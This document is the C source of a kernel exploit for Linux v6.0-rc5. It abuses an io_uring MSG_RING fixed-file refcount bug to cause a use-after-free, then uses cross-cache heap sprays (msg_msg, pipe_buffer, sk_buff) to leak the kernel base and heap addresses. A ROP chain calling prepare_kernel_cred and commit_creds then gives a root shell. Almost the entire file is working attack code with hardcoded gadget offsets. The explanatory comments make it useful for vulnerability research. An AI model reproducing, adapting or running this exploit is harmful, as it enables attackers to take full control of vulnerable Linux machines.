// For Linux kernel v6.0-rc5. Use the .config provided.
// The first half of this exploit takes heavy inspiration from https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <liburing.h>

#include "kutil.h"

#define NUM_FD 384

#define NUM_MSGQ 600
#define NUM_MSGQ_HALF NUM_MSGQ/2

#define PRIMARY_SIZE 96
#define PRIMARY_TYPE 1
#define SECONDARY_SIZE 256
#define SECONDARY_TYPE 2
#define FAKE_SIZE 4096
#define FAKE_TYPE 3

#define NUM_SPRAY 384
#define SPRAY_MSGLEN (PAGE_SIZE - MSG_MSG_SIZE + SECONDARY_SIZE - MSG_MSGSEG_SIZE)
#define SPRAY_TYPE 4

#define TERTIARY_SIZE 1024
#define TERTIARY_TYPE 5

#define NUM_PIPE 256

// Stage 2 stuff

#define NUM_FD_2 512
#define NUM_CTLSPRAY 512

#define NUM_SOCKETPAIR_2 384
#define NUM_SOCKETPAIR_3 128

char payload[SECONDARY_SIZE];

struct {
	long mtype;
	char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;

struct {
	long mtype;
	char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;

struct {
	long mtype;
	char mtext[TERTIARY_SIZE - MSG_MSG_SIZE];
} msg_tertiary;

struct {
	long mtype;
	char mtext[FAKE_SIZE];
} msg_fake;

struct {
	long mtype;
	char mtext[SPRAY_MSGLEN];
} msg_spray;


int main() {
	struct state st;
	init_exploit(&st, win);
	
	printf("[*] increased fd limit to %d\n", increase_fd_limit());
	
	int msgq[NUM_MSGQ];
	msgq_init(msgq, NUM_MSGQ);
	printf("[*] initialised %d message queues\n", NUM_MSGQ);
	
	int helper[NUM_SPRAY];
	msgq_init(helper, NUM_SPRAY);
	printf("[*] initialised %d helper queues\n", NUM_SPRAY);
	
	msg_primary.mtype = PRIMARY_TYPE;
	((uint64_t *) msg_primary.mtext)[0] = MSG_TAG;
	((uint64_t *) msg_primary.mtext)[1] = 0;
	
	for (int i=0; i<NUM_MSGQ; i++) {
		((uint64_t *) msg_primary.mtext)[2] = i;
		msgq_send(msgq[i], &msg_primary, PRIMARY_SIZE - MSG_MSG_SIZE);
	}
	printf("[*] sprayed %d primary messages\n", NUM_MSGQ);
	
	// Stage 2 stuff for later
	// We init these at the beginning so that the allocation of their associated heap structures does not mess up the heap arrangement later.
	int sockets2[NUM_SOCKETPAIR_2][2];
	skpair_init(sockets2, NUM_SOCKETPAIR_2, AF_UNIX, SOCK_STREAM, 0);
	
	int sockets3[NUM_SOCKETPAIR_3][2];
	skpair_init(sockets3, NUM_SOCKETPAIR_3, AF_UNIX, SOCK_STREAM, 0);
	printf("[*] initialised %d socket pairs\n", NUM_SOCKETPAIR_2+NUM_SOCKETPAIR_3);
	
	struct ctl_buf_spray_context * ctl_ctx = init_ctl_buf_spray(NUM_CTLSPRAY, payload, SECONDARY_SIZE);
	printf("[*] initialised ctl_buf spray for later\n");
	
	printf("[+] done with setup\n\n");
	
	// ==========
	// ==========
	
	printf("STAGE 1: KASLR & HEAP LEAK\n\n");
	
	struct io_uring r;
	io_uring_queue_init(NUM_FD, &r, 0);
	printf("[*] created io_uring\n");
	
	// Open lots of temporary files, to allocate many filps.
	int fd[NUM_FD];
	for (int i=0; i<NUM_FD; i++) {
		char temp_path[] = "/tmp/blahXXXXXX";
		fd[i] = mkstemp(temp_path);
		if (fd[i] < 0) {
			perror("[-] mkstemp");
		}
		unlink(temp_path);
	}
	
	// Register all of them to io_uring. Now they are fixed files.
	if (io_uring_register_files(&r, fd, NUM_FD) < 0) {
		perror("[-] io_uring_register_files");
	}
	printf("[*] registered %d fixed files\n", NUM_FD);
	
	// Now the reference count should be 2.
	// Trigger the bug to wrongly decrement it to 1.
	
	// Normally, IORING_OP_MSG_RING is used to signal another ring, which means the file descriptor passed should be for an io_uring.
	// But the vulnerable code path is triggered if we pass in a fixed file instead (type doesn't matter).
	struct io_uring_sqe * sqe;
	for (int i=0; i<NUM_FD; i++) {
		sqe = io_uring_get_sqe(&r);
		io_uring_prep_msg_ring(sqe, i, 0, 0, 0);
		// Remark: liburing does NOT support passing flags in the sqe for this! (see: https://github.com/axboe/liburing/blob/master/src/include/liburing.h#L1027)
		// We want to set sqe->flags (which is initialised in io_uring_prep_rw() to 0), not sqe->msg_ring_flags (which is supported).
		sqe->flags |= IOSQE_FIXED_FILE;
	}
	io_uring_submit_and_wait(&r, NUM_FD);
	printf("[*] triggering vulnerability... filp ref count should now be 1\n");
	
	for (int i=0; i<NUM_FD; i++) {
		close(fd[i]);
	}
	sleep(1);
	printf("[+] filps should be freed. ready for cross-cache\n\n");
	
	// We want to spray secondary messages with the same object size as filp (256). This will be a bit problematic later, but whatever. (<- clueless)
	
	msg_secondary.mtype = SECONDARY_TYPE;
	((uint64_t *) msg_secondary.mtext)[0] = MSG_TAG;
	((uint64_t *) msg_secondary.mtext)[1] = 1; // Corresponds to filp->f_count
	
	for (int i=0; i<NUM_MSGQ_HALF; i++) {
		((uint64_t *) msg_secondary.mtext)[2] = i;
		msgq_send(msgq[i], &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE);
	}
	
	printf("[*] sprayed %d secondary messages (1/2). filp ref count forged to be 1\n", NUM_MSGQ_HALF);
	
	// Let's try to free all the filps again.
	if (io_uring_unregister_files(&r) < 0) {
		perror("[-] io_uring_unregister_files");
	}
	sleep(1);
	printf("[*] unregistered fixed files. filps should be freed again\n");
	
	// Somehow, I don't need to craft the message to fit any additional arbitrary requirements. wow!!
	// Spray some more secondary messages. Try to get an overlap.
	for (int i=NUM_MSGQ_HALF; i<NUM_MSGQ; i++) {
		((uint64_t *) msg_secondary.mtext)[2] = i;
		msgq_send(msgq[i], &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE);
	}
	printf("[*] sprayed %d secondary messages (2/2)\n", NUM_MSGQ_HALF);
	
	// Search for overlapping secondary messages.
	int real_idx = -1;
	int fake_idx = -1;
	for (int i=0; i<NUM_MSGQ_HALF; i++) {
		msgq_copy(msgq[i], &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE, 1);
		uint64_t temp = ((uint64_t *) msg_secondary.mtext)[0];
		uint64_t temp_qid = ((uint64_t *) msg_secondary.mtext)[2];
		if (temp == MSG_TAG && i != temp_qid) {
			fake_idx = i;
			real_idx = temp_qid;
			break;
		}
	}
	if (real_idx == -1 || fake_idx == -1) {
		printf("[-] failed to find overlapping secondary messages :(\n");
		exit(-1);
	}
	printf("[+] found overlapping secondary messages %d and %d\n\n", fake_idx, real_idx);
	
	
	// Free message to make room for the sk_buff user data buffer.
	msgq_recv(msgq[real_idx], &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE, SECONDARY_TYPE);
	printf("[*] freed evil message using real queue\n");
	
	// Unfortunately, kmalloc-cg-256 is too small to fit an sk_buff data buffer (size needs to be > 320).
	// Instead, we spray msg_msgsegs to achieve almost the same effect.
	msg_spray.mtype = SPRAY_TYPE;
	memset(msg_spray.mtext, 0, sizeof(msg_spray.mtext));
	struct msg_msg * segstart = (void *) msg_spray.mtext + (PAGE_SIZE - MSG_MSG_SIZE) - 0x8;
	segstart->m_ts = FAKE_SIZE - MSG_MSG_SIZE;
	segstart->m_type = FAKE_TYPE;
	
	msgq_spray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN);
	printf("[*] sprayed %d msg_msgseg (goal: oob read - victim primary addr leak)\n", NUM_SPRAY);
	
	// Try to read OOB
	msgq_copy(msgq[fake_idx], &msg_fake, FAKE_SIZE - MSG_MSG_SIZE, 1);
	
	int victim_offset = 0;
	int victim_idx = -1;
	uint64_t victim_pri_addr = 0;
	
	// Scan for the message tag
	for (int i=SECONDARY_SIZE; i<FAKE_SIZE-MSG_MSG_SIZE; i+=SECONDARY_SIZE) {	
		uint64_t temp = ((uint64_t *)(msg_fake.mtext+i))[0];
		if (temp == MSG_TAG) {
			// Found a message
			victim_offset = i;
			victim_idx = ((uint64_t *)(msg_fake.mtext+i))[2];
			victim_pri_addr = ((uint64_t *)(msg_fake.mtext+i))[-5];
			break;
		}
	}
	if (victim_idx == -1) {
		printf("[-] didn't find any victim messages :(\n");
		exit(-1);
	}
	printf("[+] read out of bounds!\n    i found victim message %d with corresponding primary message @ %p\n\n", victim_idx, victim_pri_addr);
	
	
	// Empty all the helper queues to prep for next spray.
	msgq_unspray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN, SPRAY_TYPE);
	
	// Spray again, try to leak contents of primary message.
	memset(msg_spray.mtext, 0, sizeof(msg_spray.mtext));
	segstart->m_ts = FAKE_SIZE;
	segstart->m_type = FAKE_TYPE;
	segstart->next = victim_pri_addr - MSG_MSGSEG_SIZE;
	
	msgq_spray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN);
	printf("[*] sprayed %d msg_msgseg (goal: evil addr leak)\n", NUM_SPRAY);
	
	msgq_copy(msgq[fake_idx], &msg_fake, FAKE_SIZE, 1);
	
	uint64_t evil_addr = ((uint64_t *)(msg_fake.mtext+FAKE_SIZE-MSG_MSG_SIZE))[0] - victim_offset;
	printf("[+] recovered address of evil secondary message: %p\n\n", evil_addr);
	
	
	// Empty all the helper queues.
	msgq_unspray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN, SPRAY_TYPE);
	
	// Allocate a tertiary message for the victim message queue. This one goes in kmalloc-cg-1024.
	msg_tertiary.mtype = TERTIARY_TYPE;
	msgq_send(msgq[victim_idx], &msg_tertiary, TERTIARY_SIZE - MSG_MSG_SIZE);
	printf("[*] allocated tertiary message in kmalloc-cg-1024\n");
	
	// Now we should be able to leak its address by reading the next pointer of the victim secondary message.
	memset(msg_spray.mtext, 0, sizeof(msg_spray.mtext));
	segstart->m_ts = FAKE_SIZE - MSG_MSG_SIZE;
	segstart->m_type = FAKE_TYPE;
	
	msgq_spray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN);
	printf("[*] sprayed %d msg_msgseg (goal: oob read - victim tertiary addr leak)\n", NUM_SPRAY);
	
	// Try to read OOB
	msgq_copy(msgq[fake_idx], &msg_fake, FAKE_SIZE - MSG_MSG_SIZE, 1);
	
	uint64_t victim_ter_addr = 0;
	
	// Scan for the message tag
	for (int i=SECONDARY_SIZE; i<FAKE_SIZE-MSG_MSG_SIZE; i+=SECONDARY_SIZE) {	
		uint64_t temp = ((uint64_t *)(msg_fake.mtext+i))[0];
		uint64_t temp_idx = ((uint64_t *)(msg_fake.mtext+i))[2];
		if (temp == MSG_TAG && temp_idx == victim_idx) {
			victim_ter_addr = ((uint64_t *)(msg_fake.mtext+i))[-6];
			break;
		}
	}
	printf("[+] victim tertiary message @ %p\n\n", victim_ter_addr);
	
	
	// Free the victim tertiary message
	msgq_recv(msgq[victim_idx], &msg_tertiary, TERTIARY_SIZE - MSG_MSG_SIZE, TERTIARY_TYPE);
	printf("[*] freed victim tertiary message\n");
	
	// Reclaim with pipe_buffer
	int pipes[NUM_PIPE][2]; // pipes[i][0] is the read end, pipes[i][1] is the write end
	// Remark: pipe_buffer is ALWAYS allocated in kmalloc-1024. This is why the secondary message size is chosen to be 1024.
	pipe_init(pipes, NUM_PIPE);
	pipe_buffer_spray(pipes, NUM_PIPE);
	
	// Empty all the helper queues.
	msgq_unspray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN, SPRAY_TYPE);
	
	// One of the pipe_buffers should be at the address we just leaked. Let's do arb read.
	memset(msg_spray.mtext, 0, sizeof(msg_spray.mtext));
	segstart->m_ts = FAKE_SIZE;
	segstart->m_type = FAKE_TYPE;
	segstart->next = victim_ter_addr - MSG_MSGSEG_SIZE;
	
	msgq_spray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN);
	printf("[*] sprayed %d msg_msgseg (goal: anon_pipe_buf_ops leak)\n", NUM_SPRAY);
	
	msgq_copy(msgq[fake_idx], &msg_fake, FAKE_SIZE, 1);
	
	uint64_t anon_pipe_buf_ops = ((uint64_t *)(msg_fake.mtext+FAKE_SIZE-MSG_MSG_SIZE))[2];
	uint64_t kernel_base = anon_pipe_buf_ops - 0x121de00;
	printf("[+] anon_pipe_buf_ops: %p\n", anon_pipe_buf_ops);
	printf("[+] kernel base: %p\n\n", kernel_base); // wow!! somehow i did it without my good friend sk_buff :)
	
	
	// Allocate another tertiary message. This one is for our ROP chain.
	memset(msg_tertiary.mtext, 0, sizeof(msg_tertiary.mtext));
	uint64_t * rop = (uint64_t *) msg_tertiary.mtext;
	
	// 0xffffffff8109910d: pop rdi; ret;
	*rop++ = kernel_base + 0x9910d;
	*rop++ = 0;
	*rop++ = kernel_base + 0x9a120; // prepare_kernel_cred
	
	// 0xffffffff810c54d0: pop rsi; ret;
	*rop++ = kernel_base + 0xc54d0;
	*rop++ = kernel_base + 0x19367f0-0x41; // &no_irq_chip.irq_shutdown = 0xffffffff829367f0, this points to noop() which literally just disassembles to ret;
	
	// 0xffffffff81b62331: xchg rdi, rax; jmp qword ptr [rsi+0x41];
	*rop++ = kernel_base + 0xb62331;
	
	*rop++ = kernel_base + 0x99e70; // commit_creds
	
	// 0xffffffff81cf7844: swapgs; jmp __x86_return_thunk (note: this just jumps to a ret)
	*rop++ = kernel_base + 0xcf7844;
	// 0xffffffff81e00f8d: iretq
	*rop++ = kernel_base + 0xe00f8d;
	load_state(rop, win, &st);
	
	
	msgq_send(msgq[victim_idx], &msg_tertiary, TERTIARY_SIZE - MSG_MSG_SIZE);
	printf("[*] allocated tertiary message for ropchain\n");
	
	// Empty all the helper queues.
	msgq_unspray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN, SPRAY_TYPE);
	
	// Recover the address of the ROP chain we just put on the heap. (Don't forget to add MSG_MSG_SIZE)
	memset(msg_spray.mtext, 0, sizeof(msg_spray.mtext));
	segstart->m_ts = FAKE_SIZE - MSG_MSG_SIZE;
	segstart->m_type = FAKE_TYPE;
	
	msgq_spray(helper, NUM_SPRAY, &msg_spray, SPRAY_MSGLEN);
	printf("[*] sprayed %d msg_msgseg (goal: oob read - ropchain addr leak)\n", NUM_SPRAY);
	
	msgq_copy(msgq[fake_idx], &msg_fake, FAKE_SIZE - MSG_MSG_SIZE, 1);
	
	uint64_t rop_addr = 0;
	
	// Scan for the message tag
	for (int i=SECONDARY_SIZE; i<FAKE_SIZE-MSG_MSG_SIZE; i+=SECONDARY_SIZE) {	
		uint64_t temp = ((uint64_t *)(msg_fake.mtext+i))[0];
		uint64_t temp_idx = ((uint64_t *)(msg_fake.mtext+i))[2];
		if (temp == MSG_TAG && temp_idx == victim_idx) {
			rop_addr = ((uint64_t *)(msg_fake.mtext+i))[-6];
			break;
		}
	}
	
	rop_addr += MSG_MSG_SIZE;
	
	printf("[+] ropchain address @ %p\n\n", rop_addr);
	
	// ==========
	// ==========
	
	printf("STAGE 2: CONTROL PROGRAM FLOW\n\n");
	
	// Trigger the vulnerability again, since we can't free the evil message without triggering kernel panic.
	int fd2[NUM_FD_2];
	for (int i=0; i<NUM_FD_2; i++) {
		char temp_path[] = "/tmp/blahXXXXXX";
		fd2[i] = mkstemp(temp_path);
		if (fd2[i] < 0) {
			perror("[-] mkstemp");
		}
		unlink(temp_path);
	}
	
	if (io_uring_register_files(&r, fd2, NUM_FD_2) < 0) {
		perror("[-] io_uring_register_files");
	}
	printf("[*] registered %d fixed files\n", NUM_FD_2);
	
	for (int i=0; i<NUM_FD_2; i++) {
		sqe = io_uring_get_sqe(&r);
		io_uring_prep_msg_ring(sqe, i, 0, 0, 0);
		sqe->flags |= IOSQE_FIXED_FILE;
		io_uring_submit(&r);
	}
	printf("[*] triggering vulnerability... filp ref count should now be 1\n");
	
	for (int i=0; i<NUM_FD_2; i++) {
		close(fd2[i]);
	}
	sleep(1);
	printf("[+] filps should be freed. ready for cross-cache\n\n");
	
	// The plan is as follows:
	// 1. Spray ctl_buf. Forge the filp refcount in the appropriate field. (This is why we cannot spray sk_buff directly.) [Pages now belong to kmalloc-256]
	// 2. Free ctl_buf using the dangling filp pointers. [Pages freed]
	// 3. Spray sk_buff. [Pages now belong to skbuff_head_cache]
	// 4. Free sk_buff by releasing the ctl_buf spray. [Pages freed]
	// 5. Spray msg_msg. Overwrite the destructor and craft the rest of the message accordingly. [Pages now belong to kmalloc-cg-256]
	// 6. Trigger destructor by freeing sk_buff by reading from the socket.
	
	// Note that for step 1, we cannot use:
	// msg_msg: because when we free it in step 4, it unlinks the msg_msg from the rest of the doubly linked list.
	//          This causes the sk_buff to become unlinked from its sock, and we will not be able to trigger the destructor in step 6.
	// msg_msgseg: because we cannot free it safely without causing a null pointer dereference.
	
	((uint64_t *)(payload+56))[0] = 1;
	trigger_ctl_buf_spray(ctl_ctx); // Remark: do_spray() is called at the start because creating pthreads might mess up some heap stuff.
	printf("[*] sprayed ctl_bufs\n");
	
	// Now we can try to free everything again.
	if (io_uring_unregister_files(&r) < 0) {
		perror("[-] io_uring_unregister_files");
	}
	sleep(1);
	printf("[*] unregistered fixed files. filps should be freed again\n");
	
	// Now we can spray sk_buffs. A lot of them.
	char sock_buf[10]; // Doesn't matter what this is
	memset(sock_buf, 0, sizeof(sock_buf));
	skbuff_spray(sockets2, NUM_SOCKETPAIR_2, 1, sock_buf, sizeof(sock_buf));
	
	printf("[*] sprayed %d sk_buff\n", NUM_SOCKETPAIR_2);
	printf("[*] slab pages should belong to skbuff_head_cache\n\n");
	
	// Free the ctl_bufs.
	release_ctl_buf_spray(ctl_ctx);
	
	printf("[*] freed ctl_bufs\n");
	
	memset(msg_secondary.mtext, 0, sizeof(msg_secondary.mtext));
	
	// Remark: when we call the destructor function, rdi = rbx = rbp = sk_buff address. We control the contents of sk_buff!
	
	// 0xffffffff81ca663d: push rdi; jmp qword ptr [rbp+0x48];
	*((uint64_t *) (msg_secondary.mtext - MSG_MSG_SIZE + 96)) = kernel_base + 0xca663d; // Destructor pointer
	*((uint32_t *) (msg_secondary.mtext - MSG_MSG_SIZE + 220)) = 0x1; // refcount. If this is 0, UAF is detected and we crash.
	
	// 0xffffffff814580c2: pop rsp; jmp qword ptr [rbp-0x75];
	*((uint64_t *) (msg_secondary.mtext - MSG_MSG_SIZE + 0x48)) = kernel_base + 0x4580c2; // Remark: this ONLY works if we are allocated after another payload.
	
	// 0xffffffff8105515e: pop r15; pop r14; pop r13; pop r12; pop rbp; pop rbx; ret;
	*((uint64_t *) (msg_secondary.mtext - MSG_MSG_SIZE + 0x100-0x75)) = kernel_base + 0x5515e;
	
	uint64_t * rop2 = (uint64_t *) (msg_secondary.mtext - MSG_MSG_SIZE + 0x30);
	// 0xffffffff81069f94: pop rsp; ret;
	*rop2++ = kernel_base + 0x69f94;
	*rop2++ = rop_addr;
	
	// We don't want to construct our ROP chain here.
	// We don't know the address of the sk_buff that contains our current payload, and there are too many requirements we need to work around. It's annoying.
	// So let's pivot the stack again.
	
	msgq_spray(helper, NUM_SPRAY, &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE);
	msgq_spray(helper, NUM_SPRAY, &msg_secondary, SECONDARY_SIZE - MSG_MSG_SIZE);
	
	printf("[*] sprayed forged sk_buff\n");
	
	// When we freed the sk_buffs earlier by releasing the ctl_buf spray, some of the pages still belong to skbuff_head_cache (e.g. because partial list wasn't full yet).
	// If we try to free these again later in step 6, we will get a kernel panic due to an invalid pointer dereference.
	// Luckily, we can work around this by spraying real sk_buffs to fill up these spots.
	skbuff_spray(sockets3, NUM_SOCKETPAIR_3, 1, sock_buf, sizeof(sock_buf));
	
	printf("[*] triggering destructor function call. here goes nothing...\n");
	printf("[*] if you exit the root shell afterwards the kernel WILL panic\n\n");
	
	// In my experience, if we use i++, the first corrupted sk_buff we encounter is usually at the start of the page. We don't want this.
	// It's also pretty safe to assume that all 16 objects in said page are corrupted sk_buffs.
	// Reading every 16th socket means that there is a 15/16 chance that we will be allocated after another payload, allowing our ROP chain to work.
	for (int i=0; i<NUM_SOCKETPAIR_2; i+=16) {
		if (read(sockets2[i][1], sock_buf, sizeof(sock_buf)) < 0) {
			perror("[-] read");
		}
	}
}
